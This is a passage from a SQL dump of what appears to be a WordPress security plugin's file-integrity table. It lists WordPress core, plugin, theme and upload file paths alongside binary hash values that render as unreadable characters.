<\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��gx��.S�\0�','}<5���r������V�����m�H�dt','',0,'?'),('Ʈ�P��L�ѕ���','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-ar.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3?5!�{�ې�0','T!uVᰩ��7O�sn�0;�^Ǽ/��v�@��-','',0,'?'),('Ƽ����~9��~籌�','wp-content/plugins/wordpress-seo/inc/wpseo-non-ajax-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��@g����','vG>YV�^��Y?;M�`�@�QƂ��0�W�\"','',0,'?'),('����;Vޯ���n�Ty ','wp-includes/class-wp-theme-json-resolver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�+�\\s�Wל\0�\Z','�F��Z��i|�P�G4w�܇�d�D��S&|','',0,'?'),('�Ցf�)cW)֗�Og�','wp-content/themes/twentytwentyone/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��5�%�$���','}�C!�Mk;\'�?]�]��VW��A�e�Bߊ�','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('�� ��RN�����c��','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/UploadedFileInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<@�SA����U�m�_','SsfW|��m�9u�YU 8occ��x�5��D��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۘ���j玓݆E','��Kxf�������+eǖ٭�ʌ����m','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Df)��`Vr��Um(','�W��c?�b�53?J���&�4\'�sR4b{��','',0,'?'),('�f!�*��O��+n','wp-content/plugins/wordpress-seo/src/exceptions/addon-installation/user-cannot-activate-plugins-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K� ����CGMW�','�Q2lzcZ�J�g�������M̢G�W','',0,'?'),('�`1=K�4��','wp-content/uploads/2019/05/automatic-gates.jpg',0,'�U�*kKN���*���d','�U�*kKN���*���d','�L�4a�V_�M�b�b�@�� �����i�r','',0,'?'),('���^T��t��','wp-content/plugins/wordpress-seo/admin/config-ui/class-configuration-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�⬜�l���/\"�','» Gз������I�ڔ�ژ{-��\n�P.��','',0,'?'),('��u���2}\"蜁:','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-company-name.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+}��9�� ��n�IT',',���v!*9�\0�/5.��H=��\'G��29�=','',0,'?'),('�k8Q?<��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al͟��\ZԀ�c��','�x�����(��Sn��\n;�y{%�_�j���/','',0,'?'),('�G����e���]����','wp-content/uploads/2016/11/kitchen-2165756_960_720-350x220.jpg',0,'Wx��rG�r�-~f','Wx��rG�r�-~f','�\Z��� �:r�������K�^(���','',0,'?'),('�W}\rDŬ�w��*��','wp-includes/blocks/query-pagination-next/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b}�@�߹e�#','`�x\"��cwc�*\r��2`w�f(w�K\0','',0,'?'),('�e�X�0�x>�\r3��','wp-content/languages/en_GB-320f4ad9792aaa6dedb1e71cbdf85d57.json',0,'����\rS�C��L�','����\rS�C��L�','i�\\�U�\0��U���!�v��D=��,�O�M','',0,'?'),('�w����u�]�tF���\"','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N����ů)������','�\'�v�ᦸ� =���\'X�k��<6YS�t�','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('Nj��@}K)��f1�','wp-content/plugins/wordpress-seo/css/dist/notifications-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(v��j�VMWK�6','+�*��%��#�>ͣ�Kz���\0DO','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�rwjb���\\��i�','A����-{�4{���1&�M�+��]@�c�Ͱ�','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('ǯ��\r�?��ғ�7��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/lv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!(���2ϯu��','h���Xo�K�B`V�c�R�O\'6�OT�����','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('�ח@�֚��V��\n�','wp-content/uploads/2016/11/interior-design-960x150.jpg',0,'6���)��\0HA��R�','6���)��\0HA��R�',',3������cՓ(��(V�М�lQ�*�','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��~r\"ɽ7:\r2�#+','wp-content/uploads/2019/06/fibre-optic.jpg',0,'&E���PƸ�P�~�','&E���PƸ�P�~�','sCI�*��}�,Y}C��ny�V�x���.�U%V','',0,'?'),('���M|��\Z3n�','wp-content/uploads/2019/12/pexels-photo-164005-350x220.jpeg',0,'��rXD$?}C��U��','��rXD$?}C��U��','���\'���S�h�o{�ܠ�K�Qo\Z!V�C','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('�����)�5��Dr�\r','wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-activate-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eɳ@m�X�2�\\�b\0','�Ϛ��Qş���+��֒DW� >�<Q�.�%','',0,'?'),('����[^���yE��sB','wp-content/plugins/wordpress-seo/src/models/indexable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1�k\'!�tFl�}','�P���*�����zx\r^Č;�4@me&�dž{��}','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽ �%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('��e�P\Zya\n��','wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����z7�H�V���L�','��:���b �y�R�2��pR�;���\\\\��iS','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hwB���e (���','���^K$���1\0�nƄ&�iM{�$�^�h�','',0,'?'),('�8��j|\r�FU�af�','wp-content/themes/vega/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c���SmDX��0��','`��\\=5J�\0�J?�w��2�L�ʀo|e','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z,\r��C���Eqơ�','G��=��l��t�&��YA�@ӫ�%�N�V�','',0,'?'),('�:���7s�j����˄','wp-content/uploads/2016/11/kitchen-updraft-pre-smush-original.jpg',0,'n�\\yrB&����','n�\\yrB&����','����4�O�-����߷�\n��t��u�\'Lx','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5>�\Z�!�̄�����','\"`\n��2Zgo�j1�p�hG)M�O�Ya�\rci@G','',0,'?'),('�A�G-n��B! ��b','wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�a.V�Z�d���B','b-��L����Q�<��E��?�D�\rc�4��','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�[���tD cK��3','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('�c�������','wp-content/plugins/wordpress-seo/src/exceptions/semrush/tokens/empty-token-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','| �\\V��<�����D�','��ם���zg���r]L�yJ�x��(�','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H����k-x��f�C/','�q�~xY�\Zk����o�ϫ�(NS�B���','',0,'?'),('�}VT�\rB�P��h','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�Tf�7\0��r/','aL������Z���L[�d:E%18�ކ��','',0,'?'),('�~�eK�\nW�)-�&x','wp-content/languages/en_GB-28b3c3d595952907e08d98287077426c.json',0,'�6���(�u�H\\','�6���(�u�H\\','gb���0�4r)}�K���ݯT��^\0I��','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2A�tz`�n%��YP�','�����\\�1��[��Z�>EK��Rk��W\\�v�','',0,'?'),('ȋ�uN��1�c�7','wp-content/plugins/redirection/api/api-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�[p���\nd�CC G','a�T\'E}��0�CNE��H��`^��$7','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|w� �vi͔���cư','�b�L��]�V�mhH8�Z.c�幊�8?�\n','',0,'?'),('Ȣ��5,�(R���]��','wp-content/plugins/wordpress-seo/languages/yoast-components-en_AU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�R}��N�{k�d��','�5P\ZZ��Z*$������;�\r{ʟv�\n>7��','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a��GX9PP','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('��4�_���9I:���','wp-content/plugins/wordpress-seo/languages/wordpress-seo-pt_PT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̲^t��-�x�\\�','������) �%���;M%љx|K��\n�','',0,'?'),('��Q�q�}ޅ��[\r��<','wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\Z�eB�7���x���','fW�Ӂ�\n����jC{:2�ɪ�w���2�u[','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�)\n\\���0��u��t','wp-content/uploads/2019/08/electrician-350x220.jpg',0,'�� K���.��=_�','�� K���.��=_�','C�x�xf\n멄�~�dny�O䚳ML��]�]��','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�& �','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����٬w��$�SJ','%l��v3�����,f���6�.�Z��D�h�','',0,'?'),('�F�(%�_�і�q�','wp-content/uploads/2019/02/household-rubbish-350x220.jpg',0,'���L��\\�鯞','���L��\\�鯞','ƵQ���N�������z�%�ʙk�|2�bH�[','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/}��U�G+��','\'o�w�,X^�x���(���*����/�T?�a�','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �IZFއ��','�g?ef���Q��/8\Z��U컳��UP;�','',0,'?'),('ɧM:�E��(��6%=','wp-content/plugins/wordpress-seo/admin/class-database-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��Qp�֢��\n�&�','>�P�y:�������&\"0�TS���\'�Y','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('������h&�\'s','wp-includes/blocks/search/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\Z��V6}r��^���','|dV�X�P7:���L!{Nd.5A�TP��%�$','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('� ���tdrlPj','wp-includes/css/dist/widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/���@_��E�W�yK','�N���in�/�h+�-R�-�b�=T:��\n$VS','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_���h�A?���D','��LZ�V(j��0�~�\Z3u�)��ztef\n���O','',0,'?'),('�@>A-\0yE�\"!�#','wp-content/plugins/wordpress-seo/src/initializers/disable-core-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�E鷒П ��v��','�~X:��$z�w�쐓�t�l���\'/2�3Oݕ','',0,'?'),('�L�t/�\Z�I��I�','wp-content/plugins/redirection/locale/json/redirection-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��d�-�Y����M��','*�c� vl���ϧn���y��}\Z?\0I�,','',0,'?'),('�R���ш��0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#1志$\0���g+iV�','�\'y��,(�,+����N6J�\nU<�pWk��','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�:Ca<�y�g�','�f��!�����O.�e�}E�y�3g�����H_','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0 ����څ���\n�','�뙨�����x����WpS^�[�7��V�q��','',0,'?'),('�u\r�L�h\0��!�x','wp-content/uploads/2019/08/Massages-768x512.jpg',0,'�c|M:�B�Y�&','�c|M:�B�Y�&','���a�b�V��I��>��� ��y��','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('�{&�H�N�`b5IЌ�E','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/RefreshToken.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fUc�B���<\\5M7','%Z��eM�������>�g��*%��j˿�','',0,'?'),('ʊ�2�%�+a_��LF','wp-includes/blocks/columns/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\rc���p���$','$0��*���ں�·�%��Z8k!~X��͖�','',0,'?'),('ʗ�a?�f�rݥ6��p','wp-content/languages/en_GB-e2791ba830489d23043be8650a22a22b.json',0,'Ri�b����W ��6֚','Ri�b����W ��6֚','��]hNL7;�t>�6���L��e���M��','',0,'?'),('ʡsi#j����e��\0��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/he.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �l��w��qɳ�AD,','��|$��c�ե����TTN������!�\\','',0,'?'),('ʵs�B�s*x�n� k','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t#:��h/����2D','s� ������\r��dꥢ�6��+^�ѷ�ؾ','',0,'?'),('ʵs�� ����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ųٞh�X�r~n�f','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���ʃZ��Q��e�','\n�\r��\'J\r��>b���2�@�5z<��x�P�}','',0,'?'),('�ۨV��<��;�@P','wp-content/plugins/wordpress-seo/inc/options/class-wpseo-option-ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nQ^#��/yxv�*<d','� ��G�(���Q�W����2�F��e�Q��<��','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('�� b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��o���c�\\�ܘ','Q�d�:����[U4&&;J�ͽg��r���V�','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��Jnw��8z2�swa','�u<�O�8Be\'O�b\0y�PJ�x7���I�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u� �Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�\0�!Z�h��x�8�','wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_��w��! \n[D��Y�','�W��(8�x��ヅ6Ųp|%O����̀S��','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X & )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& W����Ř�','Iu{W�m�bk_�����.�cx\rh+K�','',0,'?'),('�:7#UD��s8�1','wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J@�!Pc���','Q��oAH��: |V(}�q�Beyc�ڊh�','',0,'?'),('�R���<%���D-�','wp-content/plugins/wp-cerber/assets/flags/co.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@]�\"^��K0��eu>','=Ө�Ĺ^ٜn�_?���*`������s�<�;2','',0,'?'),('�U<�?Y,����ػ(','wp-admin/js/svg-painter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�Pr�u6�<jsF&��','�W�Q�V��\ZA�6�In�_G��ɻ܀�Ԓ�l','',0,'?'),('�U��}�B�� Js��','wp-includes/class-wp-object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n̩$�������/V','���O�\Zm7l���W���2��m�_/2��$�','',0,'?'),('�q�8�]C���֔�','wp-content/plugins/wordfence/modules/login-security/views/common/reset-grace-period.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6�Ϝ�{��/�y','��?a��d&�.�ɖ�����q�V$��Md','',0,'?'),('�s#y�h���b�E�','wp-content/plugins/wordpress-seo/src/exceptions/missing-method.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�u\\M,!���','�C4Х� �]{(\"��f��I8F´0�z[G@6�6','',0,'?'),('�y�6�6l�M�C�','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\n�U�����ή�,','�SS,�|l��j��=� F\'ퟝ6mgDGs�','',0,'?'),('�|G��$���k���','wp-includes/js/dist/vendor/wp-polyfill-url.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J� ���ST�_','',0,'?'),('�}Ua&gl��i�)���!','wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','õ�E�����i�','O�X���b�Np����=)8�,�O��[K','',0,'?'),('ˆ]g�1{[ �pe�','wp-includes/blocks/video/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/cO��A���q��a','���xѭ�\Z�V�P��s�b�s҂�υ�l(A','',0,'?'),('ˍ�G䯀oe���o�','wp-includes/js/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�������P}�SΊ','yae�aK��R�\0%��xy��u�y�↢','',0,'?'),('˓^Q���|bx�f^�','wp-content/plugins/wordpress-seo/src/presenters/url-list-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ø���eyI���T|%x','�U����-�MŇ�٠G��j�v��0>����%�','',0,'?'),('ˤԐ�{%k�#�f�','wp-includes/js/mediaelement/wp-playlist.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����3|G^�cKT\"�','\'�e\"ʌ�_(n��f��ww�\Z�N�2�+ ','',0,'?'),('˦�&�(?�\"����','wp-content/themes/vega/assets/js/jquery.smartmenus.bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�0��4lq�i�OƬ�','KpR�j���� ���g��5 !��``���c','',0,'?'),('ˮ��q�mz-�\'�p4','wp-content/uploads/2019/05/automatic-gates-300x250.jpg',0,';�st\n�X��2���!',';�st\n�X��2���!','9����[o�q��qnb��Hݓ����','',0,'?'),('˸nQ=pF+*D~�]�5','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/container/src/NotFoundExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|{!C���\Z�.','�yZ��<��U\"�笒Y)\'\nt��iF����N�','',0,'?'),('�ǝ��Q��_y�d��+�','wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('���N��\0��ܹ�t','wp-includes/js/jquery/ui/spinner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8��TXi�M�Y�','�>�qJط���0� 